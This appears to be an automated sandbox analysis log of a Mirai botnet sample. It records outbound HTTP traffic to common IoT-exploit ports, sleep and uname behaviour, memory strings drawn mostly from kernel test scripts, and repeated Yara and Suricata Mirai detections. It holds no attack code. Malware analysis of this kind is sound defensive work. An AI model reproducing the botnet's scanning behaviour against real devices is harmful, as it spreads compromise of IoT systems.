Source: unknown	Network traffic detected: HTTP traffic on port 57628 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 35586 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 40688 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45994 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46712 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 38308 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51644 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 50162 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 33546 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 34754 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 43214 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 52728 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 59292 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55938 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 43866 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 43338 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 60554 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 51138 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 57974 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 47054 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 55244 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 59684 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 53326 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 59850 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 34950 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 42036 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 60448 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 41868 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 45392 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 45632 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 53164 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 46750 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 38622 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 57494 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 51776 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 57780 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 60110 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 58306 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 43794 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 55160 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 47708 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 58938 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 43248 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 54082 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 34328 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 43998 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 51910 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 44266 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35850 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 53116 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52562 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 38582 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55988 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 37274 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54184 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 37506 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 45864 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 58746 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 41990 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 42846 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 40164 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 34598 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 55110 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36818 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 48712 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 36564 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 48106 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 58156 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 50540 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 42708 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 49762 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 59942 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 39578 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35576 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 60924 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 52700 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 40232 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 48394 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 55648 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 44432 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 33012 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 55954 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 46500 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43048 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 39882 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 55180 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 44056 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 56264 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 37160 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48330 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 47692 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 35060 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59712 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 50490 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 57816 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 60400 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 38148 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 38486 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 38580 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 59584 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 35474 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 33648 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 44528 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 58242 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 40580 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 36058 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 58002 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 42528 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 46286 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 47156 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 56316 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 43088 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34238 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 38530 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 50966 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 50996 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 33992 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 47942 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 34716 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 43088 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 42632 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 49500 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 41238 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 40682 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 46138 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 48772 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 39324 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 52278 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 45440 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 43928 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 35368 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 41932 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35718 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 57012 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 55064 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52068 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 42904 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 42350 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 60458 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 52488 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 53836 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 46634 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 43014 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45622 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 52776 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 44658 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48362 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 51630 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 36688 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 35872 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 37084 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 38894 -> 81
Source: unknown	Network traffic detected: HTTP traffic on port 48866 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 45756 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 55176 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 40326 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 42862 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 36844 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 48580 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 42422 -> 8443
Source: unknown	Network traffic detected: HTTP traffic on port 48404 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 49056 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38952 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 48022 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 49512 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 41590 -> 49152
Source: unknown	Network traffic detected: HTTP traffic on port 44284 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 56568 -> 7574
Source: unknown	Network traffic detected: HTTP traffic on port 53868 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 60970 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 56124 -> 5555
Source: unknown	Network traffic detected: HTTP traffic on port 42338 -> 52869
Source: unknown	Network traffic detected: HTTP traffic on port 38148 -> 37215
Source: unknown	Network traffic detected: HTTP traffic on port 54118 -> 7574

Source: /tmp/bin.sh.elf (PID: 6271)

Sleeps longer then 60s: 600.0s

Jump to behavior

Source: /tmp/bin.sh.elf (PID: 6240)	Queries kernel information via 'uname':	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6244)	Queries kernel information via 'uname':	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6257)	Queries kernel information via 'uname':	Jump to behavior

Source: kvm-test-1-run.sh.34.dr	Binary or memory string: echo Monitoring qemu job at pid $qemu_pid
Source: functions.sh2.34.dr	Binary or memory string: qemu-system-ppc64)
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: ( $QEMU $qemu_args -m $TORTURE_QEMU_MEM -kernel $KERNEL -append "$qemu_append $boot_args" > $resdir/qemu-output 2>&1 & echo $! > $resdir/qemu_pid; wait `cat $resdir/qemu_pid`; echo $? > $resdir/qemu-retval ) &
Source: kvm.sh.34.dr	Binary or memory string: print "kvm-test-1-run.sh " CONFIGDIR cf[j], builddir, rd cfr[jn], dur " \"" TORTURE_QEMU_ARG "\" \"" TORTURE_BOOTARGS "\" > " rd cfr[jn] "/kvm-test-1-run.sh.out 2>&1 &"
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: if kill -0 $qemu_pid > /dev/null 2>&1
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: qemu_args="`specify_qemu_cpus "$QEMU" "$qemu_args" "$cpu_count"`"
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: echo Monitoring qemu job at yet-as-unknown pid
Source: kvm.sh.34.dr	Binary or memory string: -v TORTURE_QEMU_ARG="$TORTURE_QEMU_ARG" \
Source: functions.sh2.34.dr	Binary or memory string: identify_qemu_append () {
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: QEMU="`identify_qemu vmlinux`"
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: qemu_args="$qemu_args `identify_qemu_args "$QEMU" "$resdir/console.log"`"
Source: kvm.sh.34.dr	Binary or memory string: TORTURE_QEMU_INTERACTIVE="$TORTURE_QEMU_INTERACTIVE"; export TORTURE_QEMU_INTERACTIVE
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: if test -z "$qemu_pid" -a -s "$resdir/qemu_pid"
Source: bin.sh.elf, 6240.1.0000557074cec000.0000557074e3e000.rw-.sdmp, bin.sh.elf, 6242.1.0000557074cec000.0000557074e3e000.rw-.sdmp	Binary or memory string: tpU!/etc/qemu-binfmt/arm
Source: functions.sh2.34.dr	Binary or memory string: identify_qemu_args () {
Source: functions.sh2.34.dr	Binary or memory string: qemu-system-x86_64\|qemu-system-i386)
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: # Generate -smp qemu argument.
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: echo "!!! PID $qemu_pid hung at $kruntime vs. $seconds seconds" >> $resdir/Warnings 2>&1
Source: functions.sh2.34.dr	Binary or memory string: # Output arguments for the qemu "-append" string based on CPU type
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: killpid="`sed -n "s/^(qemu) qemu: terminating on signal [0-9]* from pid $[0-9]$.$/\1/p" $resdir/Warnings`"
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: qemu_pid=`cat "$resdir/qemu_pid"`
Source: functions.sh2.34.dr	Binary or memory string: echo qemu-system-ppc64
Source: functions.sh2.34.dr	Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE" -a -n "$TORTURE_QEMU_MAC"
Source: functions.sh2.34.dr	Binary or memory string: echo qemu-system-aarch64
Source: kvm-recheck-rcu.sh.34.dr	Binary or memory string: dur=`sed -e 's/^.* rcutorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: functions.sh2.34.dr	Binary or memory string: # identify_qemu_append qemu-cmd
Source: kvm.sh.34.dr	Binary or memory string: print "needqemurun="
Source: functions.sh2.34.dr	Binary or memory string: identify_qemu_vcpus () {
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: if test $commandcompleted -eq 0 -a -n "$qemu_pid"
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: if test -z "$qemu_pid" \|\| kill -0 "$qemu_pid" > /dev/null 2>&1
Source: kvm.sh.34.dr	Binary or memory string: print "\tneedqemurun=1"
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: echo "NOTE: $QEMU either did not run or was interactive" > $resdir/console.log
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: qemu_args=$5
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: # Generate qemu -append arguments
Source: bin.sh.elf, 6240.1.00007fff2af3b000.00007fff2af5c000.rw-.sdmp, bin.sh.elf, 6242.1.00007fff2af3b000.00007fff2af5c000.rw-.sdmp	Binary or memory string: /usr/bin/qemu-arm
Source: functions.sh2.34.dr	Binary or memory string: echo -device spapr-vlan,netdev=net0,mac=$TORTURE_QEMU_MAC
Source: kvm.sh.34.dr	Binary or memory string: checkarg --qemu-cmd "(qemu-system-...)" $# "$2" 'qemu-system-' '^--'
Source: functions.sh2.34.dr	Binary or memory string: echo qemu-system-i386
Source: functions.sh2.34.dr	Binary or memory string: # Output arguments for qemu arguments based on the TORTURE_QEMU_MAC
Source: kvm.sh.34.dr	Binary or memory string: print "if test -n \"$needqemurun\""
Source: functions.sh2.34.dr	Binary or memory string: echo qemu-system-x86_64
Source: functions.sh2.34.dr	Binary or memory string: identify_qemu () {
Source: parse-console.sh.34.dr	Binary or memory string: print_warning Console output contains nul bytes, old qemu still running?
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: sleep 10 # Give qemu's pid a chance to reach the file
Source: functions.sh2.34.dr	Binary or memory string: # Usually this will be one of /usr/bin/qemu-system-*
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: kill -KILL $qemu_pid
Source: functions.sh2.34.dr	Binary or memory string: qemu-system-aarch64)
Source: kvm.sh.34.dr	Binary or memory string: checkarg --qemu-args "(qemu arguments)" $# "$2" '^-' '^error'
Source: bin.sh.elf, 6240.1.00007fff2af3b000.00007fff2af5c000.rw-.sdmp, bin.sh.elf, 6242.1.00007fff2af3b000.00007fff2af5c000.rw-.sdmp	Binary or memory string: x86_64/usr/bin/qemu-arm/tmp/bin.sh.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/bin.sh.elf
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: echo Unknown PID, cannot kill qemu command
Source: kvm-recheck-lock.sh.34.dr	Binary or memory string: dur=`sed -e 's/^.* locktorture.shutdown_secs=//' -e 's/ .*$//' < $i/qemu-cmd 2> /dev/null`
Source: functions.sh2.34.dr	Binary or memory string: # and TORTURE_QEMU_INTERACTIVE environment variables.
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: BOOT_IMAGE="`identify_boot_image $QEMU`"
Source: functions.sh2.34.dr	Binary or memory string: if test -n "$TORTURE_QEMU_INTERACTIVE"
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: echo $QEMU $qemu_args -m $TORTURE_QEMU_MEM -kernel $KERNEL -append \"$qemu_append $boot_args\" > $resdir/qemu-cmd
Source: functions.sh2.34.dr	Binary or memory string: qemu-system-x86_64\|qemu-system-i386\|qemu-system-aarch64)
Source: functions.sh2.34.dr	Binary or memory string: qemu-system-x86_64)
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: echo Grace period for qemu job at pid $qemu_pid
Source: functions.sh2.34.dr	Binary or memory string: qemu-system-aarch64)
Source: functions.sh2.34.dr	Binary or memory string: qemu-system-x86_64\|qemu-system-i386)
Source: functions.sh2.34.dr	Binary or memory string: # Returns our best guess as to which qemu command is appropriate for
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: grep "^(qemu) qemu:" $resdir/kvm-test-1-run.sh.out >> $resdir/Warnings 2>&1
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: qemu_pid=""
Source: functions.sh2.34.dr	Binary or memory string: # Appends a string containing "-smp XXX" to qemu-args, unless the incoming
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: elif test -z "$qemu_pid"
Source: bin.sh.elf, 6240.1.0000557074cec000.0000557074e3e000.rw-.sdmp, bin.sh.elf, 6242.1.0000557074cec000.0000557074e3e000.rw-.sdmp	Binary or memory string: /etc/qemu-binfmt/arm
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: qemu_append="`identify_qemu_append "$QEMU"`"
Source: functions.sh2.34.dr	Binary or memory string: elif test -n "$TORTURE_QEMU_INTERACTIVE"
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: if test -z "$qemu_pid" -a -s "$resdir/qemu_pid"
Source: kvm.sh.34.dr	Binary or memory string: --qemu-args\|--qemu-arg)
Source: kvm.sh.34.dr	Binary or memory string: TORTURE_QEMU_CMD="$TORTURE_QEMU_CMD"; export TORTURE_QEMU_CMD
Source: kvm.sh.34.dr	Binary or memory string: TORTURE_QEMU_MEM="$TORTURE_QEMU_MEM"; export TORTURE_QEMU_MEM
Source: functions.sh2.34.dr	Binary or memory string: echo $TORTURE_QEMU_CMD
Source: kvm.sh.34.dr	Binary or memory string: TORTURE_QEMU_MAC=$2
Source: kvm.sh.34.dr	Binary or memory string: TORTURE_QEMU_INTERACTIVE=1; export TORTURE_QEMU_INTERACTIVE
Source: kvm.sh.34.dr	Binary or memory string: TORTURE_QEMU_MEM=$2
Source: functions.sh2.34.dr	Binary or memory string: specify_qemu_cpus () {
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: vcpus=`identify_qemu_vcpus`
Source: functions.sh2.34.dr	Binary or memory string: qemu-system-i386)
Source: functions.sh2.34.dr	Binary or memory string: qemu-system-ppc64)
Source: functions.sh2.34.dr	Binary or memory string: # identify_boot_image qemu-cmd
Source: kvm.sh.34.dr	Binary or memory string: TORTURE_QEMU_ARG="$2"
Source: kvm.sh.34.dr	Binary or memory string: print "needqemurun="
Source: functions.sh2.34.dr	Binary or memory string: # qemu-args already contains "-smp".
Source: functions.sh2.34.dr	Binary or memory string: # Use TORTURE_QEMU_CMD environment variable or appropriate
Source: functions.sh2.34.dr	Binary or memory string: echo Cannot figure out what qemu command to use! 1>&2
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: QEMU="`identify_qemu $base_resdir/vmlinux`"
Source: functions.sh2.34.dr	Binary or memory string: # the kernel at hand. Override with the TORTURE_QEMU_CMD environment variable.
Source: functions.sh2.34.dr	Binary or memory string: # identify_qemu_vcpus
Source: kvm.sh.34.dr	Binary or memory string: TORTURE_QEMU_CMD="$2"
Source: functions.sh2.34.dr	Binary or memory string: # specify_qemu_cpus qemu-cmd qemu-args #cpus
Source: functions.sh2.34.dr	Binary or memory string: # identify_qemu_args qemu-cmd serial-file
Source: functions.sh2.34.dr	Binary or memory string: if test -n "$TORTURE_QEMU_CMD"
Source: kvm.sh.34.dr	Binary or memory string: --qemu-cmd)
Source: kvm.sh.34.dr	Binary or memory string: TORTURE_QEMU_MAC="$TORTURE_QEMU_MAC"; export TORTURE_QEMU_MAC
Source: functions.sh2.34.dr	Binary or memory string: # identify_qemu builddir
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: qemu_args="-enable-kvm -nographic $qemu_args"
Source: functions.sh2.34.dr	Binary or memory string: # and the TORTURE_QEMU_INTERACTIVE environment variable.
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: # Generate architecture-specific and interaction-specific qemu arguments
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: qemu_pid=`cat "$resdir/qemu_pid"`
Source: kvm-test-1-run.sh.34.dr	Binary or memory string: if test -s "$resdir/qemu_pid"

Stealing of Sensitive Information

Yara detected Mirai

Source: Yara match	File source: 6242.1.00007fb730017000.00007fb730058000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 6240.1.00007fb730017000.00007fb730058000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: bin.sh.elf, type: SAMPLE
Source: Yara match	File source: /usr/networks, type: DROPPED
Source: Yara match	File source: 6242.1.00007fb730060000.00007fb73006a000.rw-.sdmp, type: MEMORY
Source: Yara match	File source: 6240.1.00007fb730060000.00007fb73006a000.rw-.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: bin.sh.elf PID: 6242, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: bin.sh.elf PID: 6240, type: MEMORYSTR

Remote Access Functionality

Detected Mirai

Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
Source: Traffic	Suricata IDS: ET MALWARE Mirai Variant User-Agent (Outbound)
